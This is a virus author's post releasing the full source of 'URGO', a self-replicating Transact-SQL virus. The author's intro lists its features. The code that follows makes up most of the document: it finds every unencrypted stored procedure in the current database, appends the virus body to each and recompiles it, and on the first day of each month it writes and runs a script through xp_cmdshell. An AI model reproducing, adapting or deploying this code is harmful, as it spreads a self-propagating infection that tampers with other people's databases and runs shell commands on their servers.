URGO/Psychologic

URGO was made as proof of concept, This is my old stuff, I've code many SQL virus after that (never released) they are made maybe 
arround 2006, First I thought that URGO is the first TSQL virus, but it didn't. I've read spth website and see Someone called
jgama has released the first one in 2004, his code seems like mine but he uses CURSOR to read current entrypoint, I've think about that
not very good because it will take much memory, and URGO uses temporary to search current entrypoint and it also have simple Payload
on 1st every month, just a message that called by cmdshell, I also code several variant from URGO that has implement epo,poly,encrypt,cross
infectinon etc, but its too risk to published. 

Urgo is :

- Parasitic Direct action last appender tsql virus
- Infect Procedures only
- Infect current database only
- Using temporary table to restore virus entrypoint
- No encrypt
- No poly
- No epo
- payload with xp_CMDShell, will return error if xp_CMDShell not activated

Thats all about URGO,now Here is URGO. Maybe now is the second parasitic direct action Transact-SQL appender virus ever made

Notes : Has been tested, Urgo Work stable in all SQL Server variant
Greets : dJANGGO ~ Yes,3F are 3L1t3 :D

----------------------------------------------------------------------------------------URGO CODE CUT
ALTER PROCEDURE [dbo].[URGO] 
AS

--URGO1
if OBJECT_ID('tempdb..#urgo') is not null
	begin
		drop table #urgo
	end
IF (SELECT DAY(GETDATE()))=1 
BEGIN
DECLARE @sCmd varchar(256)
SET @sCmd= 'echo>c:\pay.vbs msgbox "TSQL.URGO By psychologic, First ever Transact sql virus" '
EXEC master..xp_cmdshell @sCmd, no_output
EXEC master..xp_CMDShell 'cscript d:\pay.vbs' 
END
CREATE TABLE #urgo
	(r int
	,dbname VARCHAR(max)
	,query VARCHAR(max))

INSERT #urgo (r,dbname,query)
SELECT rank() OVER (ORDER BY x.name) as n,x.name,x.text from
(SELECT o.name,LEN(c.text) FROM sysobjects o INNER JOIN syscomments
 c ON c.id = o.id WHERE o.type='p' and encrypted=0 and o.category=0
and c.text not like '%URGO%')X

declare @vb varchar(max),@com varchar(max),@a int,@b int,@i int
set @vb=(SELECT c.text FROM sysobjects o INNER JOIN syscomments c ON c.id = o.id WHERE o.type='p' and (o.category=0) and (o.id = @@Procid))
set @a=CHARINDEX('--URGO1',@vb)
set @b=CHARINDEX(convert(varchar(7),0x2D2D5552474F32),@vb)
set @vb=SUBSTRING(@vb, @a, @b-@a+7)

SET @i = 1
WHILE (@i <=(SELECT COUNT(*) FROM #urgo))
	BEGIN

SET @com = (select query from #urgo where r=@i)
set @a=1
rep:
set @a=CHARINDEX('AS',@com,(@a+1))
IF @a>0 and ascii(SUBSTRING(@com,@a-1,1)) NOT IN (32,13,10,9,0) GOTO rep
IF @a>0 and ascii(SUBSTRING(@com,@a+2,1)) NOT IN (32,13,10,9,0) GOTO rep
set @b=@a
while (@b>1) and (ascii(SUBSTRING(@com,@b,1))<>13) set @b=@b-1
if CHARINDEX('--',SUBSTRING(@com,@b,@a-@b))>0  GOTO rep
set @b=@a
while (@b>2) and (SUBSTRING(@com,@b,1)<>'*') and (SUBSTRING(@com,@b-1,1)<>'/') set @b=@b-1
if (@b<@a)and (CHARINDEX('*/',@com,@b)>@a)  GOTO rep
set @com=stuff(@com, @a+2,1,char(13))
set @com=@com+@vb
set @com=replace(@com,'CREATE PROCEDURE','ALTER PROCEDURE')
EXEC( @com)
set @i = @i + 1
end
--URGO2

